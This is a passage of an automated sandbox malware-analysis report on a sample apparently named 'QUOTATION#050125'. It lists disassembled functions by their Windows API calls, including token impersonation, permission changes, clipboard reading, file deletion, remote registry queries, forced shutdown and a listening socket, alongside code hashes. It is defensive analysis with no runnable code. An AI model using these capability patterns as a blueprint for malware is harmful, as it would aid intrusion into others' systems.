AttachThreadInput.USER32(?,000000FF,00000000), ref: 004DF557

Strings

Shell_TrayWnd, xrefs: 004DF46F

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: fd2ba3e91c0c9fd9a1fbb631074171d260756226a243839489d641133f403fee
Instruction ID: c17a14e9076ccc4c53f000712dfa4b2925bd3c55edb2ed2ebd1c722d4b9920fb
Opcode Fuzzy Hash: fd2ba3e91c0c9fd9a1fbb631074171d260756226a243839489d641133f403fee
Instruction Fuzzy Hash: EA318171A80318BBEB306BB55C4AFFF7E6DEB44B50F104026FA01E62D1C6B55D04AAA5

Function 004E1201 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 004E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004E170D
Part of subcall function 004E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004E173A
Part of subcall function 004E16C3: GetLastError.KERNEL32 ref: 004E174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 004E1286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 004E12A8
CloseHandle.KERNEL32(?), ref: 004E12B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004E12D1
GetProcessWindowStation.USER32 ref: 004E12EA
SetProcessWindowStation.USER32(00000000), ref: 004E12F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004E1310

Part of subcall function 004E10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004E11FC), ref: 004E10D4
Part of subcall function 004E10BF: CloseHandle.KERNEL32(?,?,004E11FC), ref: 004E10E9

Strings

ZT, xrefs: 004E1392
default, xrefs: 004E130B
winsta0, xrefs: 004E12CC
, xrefs: 004E125A

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$ZT
API String ID: 22674027-2680980081
Opcode ID: 3ccb81989abdc86f91a20c549b2763ef6681c5e57dcbbb2f29ab220d252751e4
Instruction ID: d12f6758bb6750ef7b6a3f18fe8ca4da8ef1512623fa2c6086ec08aba2111dcf
Opcode Fuzzy Hash: 3ccb81989abdc86f91a20c549b2763ef6681c5e57dcbbb2f29ab220d252751e4
Instruction Fuzzy Hash: D181B371980288AFDF119FA6DC49FEF7FB9EF04706F14811AF910A62A0D7798944DB24

Function 004E0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004E1114
Part of subcall function 004E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,004E0B9B,?,?,?), ref: 004E1120
Part of subcall function 004E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004E0B9B,?,?,?), ref: 004E112F
Part of subcall function 004E10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004E0B9B,?,?,?), ref: 004E1136
Part of subcall function 004E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004E114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004E0BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004E0C00
GetLengthSid.ADVAPI32(?), ref: 004E0C17
GetAce.ADVAPI32(?,00000000,?), ref: 004E0C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004E0C6D
GetLengthSid.ADVAPI32(?), ref: 004E0C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 004E0C8C
HeapAlloc.KERNEL32(00000000), ref: 004E0C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 004E0CB4
CopySid.ADVAPI32(00000000), ref: 004E0CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004E0CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004E0D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 004E0D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004E0D45
HeapFree.KERNEL32(00000000), ref: 004E0D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004E0D55
HeapFree.KERNEL32(00000000), ref: 004E0D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004E0D65
HeapFree.KERNEL32(00000000), ref: 004E0D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 004E0D78
HeapFree.KERNEL32(00000000), ref: 004E0D7F

Part of subcall function 004E1193: GetProcessHeap.KERNEL32(00000008,004E0BB1,?,00000000,?,004E0BB1,?), ref: 004E11A1
Part of subcall function 004E1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,004E0BB1,?), ref: 004E11A8
Part of subcall function 004E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,004E0BB1,?), ref: 004E11B7

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: f7eff613f7ff49e7f4b94713dff4bbec201e71fd37c0ba278b3d57acadb3e326
Instruction ID: a5bac240b1951033b6636a3147f9c6d598e8f74e22e42f418dfed01047c24128
Opcode Fuzzy Hash: f7eff613f7ff49e7f4b94713dff4bbec201e71fd37c0ba278b3d57acadb3e326
Instruction Fuzzy Hash: 2D719E7194024AEBDF10DFA5DC48FEFBBB8BF08301F148116E924A6290D7B9A945CB60

Function 004FEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0051CC08), ref: 004FEB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 004FEB37
GetClipboardData.USER32(0000000D), ref: 004FEB43
CloseClipboard.USER32 ref: 004FEB4F
GlobalLock.KERNEL32(00000000), ref: 004FEB87
CloseClipboard.USER32 ref: 004FEB91
GlobalUnlock.KERNEL32(00000000), ref: 004FEBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 004FEBC9
GetClipboardData.USER32(00000001), ref: 004FEBD1
GlobalLock.KERNEL32(00000000), ref: 004FEBE2
GlobalUnlock.KERNEL32(00000000), ref: 004FEC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 004FEC38
GetClipboardData.USER32(0000000F), ref: 004FEC44
GlobalLock.KERNEL32(00000000), ref: 004FEC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 004FEC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 004FEC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 004FECD2
GlobalUnlock.KERNEL32(00000000), ref: 004FECF3
CountClipboardFormats.USER32 ref: 004FED14
CloseClipboard.USER32 ref: 004FED59

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 2ad332b1c52942a867cb71a97f2e391244aa332502cb771bf092ad39931fc787
Instruction ID: 0ce701a92148f5644420516197378782ee2d5aefc3a962d2df9620edb57b6355
Opcode Fuzzy Hash: 2ad332b1c52942a867cb71a97f2e391244aa332502cb771bf092ad39931fc787
Instruction Fuzzy Hash: 9E6105342043069FD300EF26C884F7A7BA4AF94705F04855EF596972B1CB3AED4ADB66

Function 004F698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 004F69BE
FindClose.KERNEL32(00000000), ref: 004F6A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004F6A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004F6A75
FileTimeToSystemTime.KERNEL32(?,?), ref: 004F6AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 004F6ADF

Strings

%02d, xrefs: 004F6C00, 004F6C0A, 004F6C5A, 004F6CAA, 004F6CFA, 004F6D4A
%03d, xrefs: 004F6DA2
%4d%02d%02d%02d%02d%02d, xrefs: 004F6B6A
%4d, xrefs: 004F6BB1
%4d%02d%02d%02d%02d%02d%03d, xrefs: 004F6B32

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3232708057-3289030164
Opcode ID: f51c76431aad33a31e44fa94170e89667f38eecc89460497cfbedc81c6e491e4
Instruction ID: 1eb6ff33ed32c1d2404dbf908d94f89350a7ca33a2dd78a539a5051054db9ccc
Opcode Fuzzy Hash: f51c76431aad33a31e44fa94170e89667f38eecc89460497cfbedc81c6e491e4
Instruction Fuzzy Hash: AFD16171508300AEC710EBA1C891EBFB7ECAF99708F04491EF685D7191EB78DA48C766

Function 004F9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76C48FB0,?,00000000), ref: 004F9663
GetFileAttributesW.KERNEL32(?), ref: 004F96A1
SetFileAttributesW.KERNEL32(?,?), ref: 004F96BB
FindNextFileW.KERNEL32(00000000,?), ref: 004F96D3
FindClose.KERNEL32(00000000), ref: 004F96DE
FindFirstFileW.KERNEL32(*.*,?), ref: 004F96FA
SetCurrentDirectoryW.KERNEL32(?), ref: 004F974A
SetCurrentDirectoryW.KERNEL32(00546B7C), ref: 004F9768
FindNextFileW.KERNEL32(00000000,00000010), ref: 004F9772
FindClose.KERNEL32(00000000), ref: 004F977F
FindClose.KERNEL32(00000000), ref: 004F978F

Strings

*.*, xrefs: 004F96F5

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 0db6b295769da5f218d52f2602f56bda34b87ad1b8a636fda289c399a6a0de12
Instruction ID: 3cc8acb7cd58d7e8efc4d7b267d37dd37dc226dba9f17a11ce7fd32092a188c9
Opcode Fuzzy Hash: 0db6b295769da5f218d52f2602f56bda34b87ad1b8a636fda289c399a6a0de12
Instruction Fuzzy Hash: E531C33254021DABDB10AFB4DC08BEF7BACAF09325F108196FA25E2190DB39DD448A59

Function 004F979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76C48FB0,?,00000000), ref: 004F97BE
FindNextFileW.KERNEL32(00000000,?), ref: 004F9819
FindClose.KERNEL32(00000000), ref: 004F9824
FindFirstFileW.KERNEL32(*.*,?), ref: 004F9840
SetCurrentDirectoryW.KERNEL32(?), ref: 004F9890
SetCurrentDirectoryW.KERNEL32(00546B7C), ref: 004F98AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 004F98B8
FindClose.KERNEL32(00000000), ref: 004F98C5
FindClose.KERNEL32(00000000), ref: 004F98D5

Part of subcall function 004EDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004EDB00

Strings

*.*, xrefs: 004F983B

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 0e167f58a1602cf5d47aa602a06e2cca1bda9304ca6ab6d67ff42d58d6ebe5f6
Instruction ID: 97c329622d72c8e0135e5e3ce0c39ac38441f80823b0a58381d78dd9b2f43cfe
Opcode Fuzzy Hash: 0e167f58a1602cf5d47aa602a06e2cca1bda9304ca6ab6d67ff42d58d6ebe5f6
Instruction Fuzzy Hash: C531E73254021D6ADB10BFB5DC48BEF3BACEF06364F148197F960A2190DB39DD888E59

Function 0050BE44 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0050C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0050B6AE,?,?), ref: 0050C9B5

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0050BF3E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0050BFA9
RegCloseKey.ADVAPI32(00000000), ref: 0050BFCD
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0050C02C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0050C0E7
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0050C154
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0050C1E9
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0050C23A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0050C2E3
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0050C382
RegCloseKey.ADVAPI32(00000000), ref: 0050C38F

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3218304859-0
Opcode ID: 4c56db59dd76e7b56fcf7c376b9ab8b4fdc4c110b16ece99b2d4f7170a6a8329
Instruction ID: 70f6d20d3b63aa93503517670337c005c685b0c8a73d0ae15e9a5116ec26fb36
Opcode Fuzzy Hash: 4c56db59dd76e7b56fcf7c376b9ab8b4fdc4c110b16ece99b2d4f7170a6a8329
Instruction Fuzzy Hash: 43023971604201AFD714DF28C895E2EBBE5BF89308F18899DF84ADB2A2D731ED45CB51

Function 004F8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 004F8257
SystemTimeToFileTime.KERNEL32(?,?), ref: 004F8267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004F8273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004F8310
SetCurrentDirectoryW.KERNEL32(?), ref: 004F8324
SetCurrentDirectoryW.KERNEL32(?), ref: 004F8356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 004F838C
SetCurrentDirectoryW.KERNEL32(?), ref: 004F8395

Strings

*.*, xrefs: 004F839B

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 4d2edac7f521891fecd20fe067c58131a4578091e47605928d1a9290e28ca7a9
Instruction ID: 3d4c078d9c1012814cdc5197cf1f018cbac80b6dda51ff9d2b8ebfeb0a22cdf6
Opcode Fuzzy Hash: 4d2edac7f521891fecd20fe067c58131a4578091e47605928d1a9290e28ca7a9
Instruction Fuzzy Hash: F3616D725043499FC710EF61C8409AFB7E8FF89318F04891EFA9987251DB39E945CB96

Function 004ED076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00483AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00483A97,?,?,00482E7F,?,?,?,00000000), ref: 00483AC2

Part of subcall function 004EE199: GetFileAttributesW.KERNEL32(?,004ECF95), ref: 004EE19A

FindFirstFileW.KERNEL32(?,?), ref: 004ED122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 004ED1DD
MoveFileW.KERNEL32(?,?), ref: 004ED1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 004ED20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 004ED237

Part of subcall function 004ED29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,004ED21C,?,?), ref: 004ED2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 004ED253
FindClose.KERNEL32(00000000), ref: 004ED264

Strings

\*.*, xrefs: 004ED0CD, 004ED0D6, 004ED0EB

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: fbcd2e6301e0877850a0a17aea7d3313638e09b0e68d257c1156298f1e8e3431
Instruction ID: d1334aefea82fa02a087a810e501224aebac83364a01debc2c308284644e4da0
Opcode Fuzzy Hash: fbcd2e6301e0877850a0a17aea7d3313638e09b0e68d257c1156298f1e8e3431
Instruction Fuzzy Hash: CE617C31C011499BCF05FBE2CA429FEB775AF14309F2445AAE40273191EB395F09DB69

Function 004FED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004FED91
EmptyClipboard.USER32 ref: 004FED97
GlobalAlloc.KERNEL32(00000002,?), ref: 004FEDAC
CloseClipboard.USER32 ref: 004FEEA3

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: d6d74234605046f98c2b432f154ab5f94f62c125e3bfee039884fe201d0bc2eb
Instruction ID: 85923b93bd8548500368cb38a66c099133ae562566a45dcfb7c95a8839ea2f4b
Opcode Fuzzy Hash: d6d74234605046f98c2b432f154ab5f94f62c125e3bfee039884fe201d0bc2eb
Instruction Fuzzy Hash: 8F41D034204611AFE310DF16E888B6ABBE1EF54319F14C49AE5558BB72C73AEC42CB94

Function 004EE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 004E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004E170D
Part of subcall function 004E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004E173A
Part of subcall function 004E16C3: GetLastError.KERNEL32 ref: 004E174A

ExitWindowsEx.USER32(?,00000000), ref: 004EE932

Strings

SeShutdownPrivilege, xrefs: 004EE902
@, xrefs: 004EE925
, xrefs: 004EE95C
, xrefs: 004EE920

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: c95c0c6ddd32662146932e32d8814d543968bb4c3182b5da42fb50835f7fd992
Instruction ID: c7d8589c897ee1ec78268bf5fdfce33941ffd735b61608f4566b15ed9c9a37f3
Opcode Fuzzy Hash: c95c0c6ddd32662146932e32d8814d543968bb4c3182b5da42fb50835f7fd992
Instruction Fuzzy Hash: C8012BB2A50251ABEB1463B79C85FFF76DC9714746F154823F803E32E3D5A95C4481A8

Function 00501204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00501276
WSAGetLastError.WSOCK32 ref: 00501283
bind.WSOCK32(00000000,?,00000010), ref: 005012BA
WSAGetLastError.WSOCK32 ref: 005012C5
closesocket.WSOCK32(00000000), ref: 005012F4
listen.WSOCK32(00000000,00000005), ref: 00501303
WSAGetLastError.WSOCK32 ref: 0050130D
closesocket.WSOCK32(00000000), ref: 0050133C

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 27e5b18bfacb1e93037c63da509b3e23f5410832d848d8f4cc64f74887c11ffb
Instruction ID: 7bd4dc8f1ab118395c4ec1e1f874ad3eca03ef497a3ff4dd2833d5f940de29e3
Opcode Fuzzy Hash: 27e5b18bfacb1e93037c63da509b3e23f5410832d848d8f4cc64f74887c11ffb
Instruction Fuzzy Hash: 43418E35600501AFD710DF69C488B69BFE6BF46318F188598E8568F2D2C771EC85CBE1

Function 004ED3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00483AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00483A97,?,?,00482E7F,?,?,?,00000000), ref: 00483AC2

Part of subcall function 004EE199: GetFileAttributesW.KERNEL32(?,004ECF95), ref: 004EE19A

FindFirstFileW.KERNEL32(?,?), ref: 004ED420
DeleteFileW.KERNEL32(?,?,?,?), ref: 004ED470
FindNextFileW.KERNEL32(00000000,00000010), ref: 004ED481
FindClose.KERNEL32(00000000), ref: 004ED498
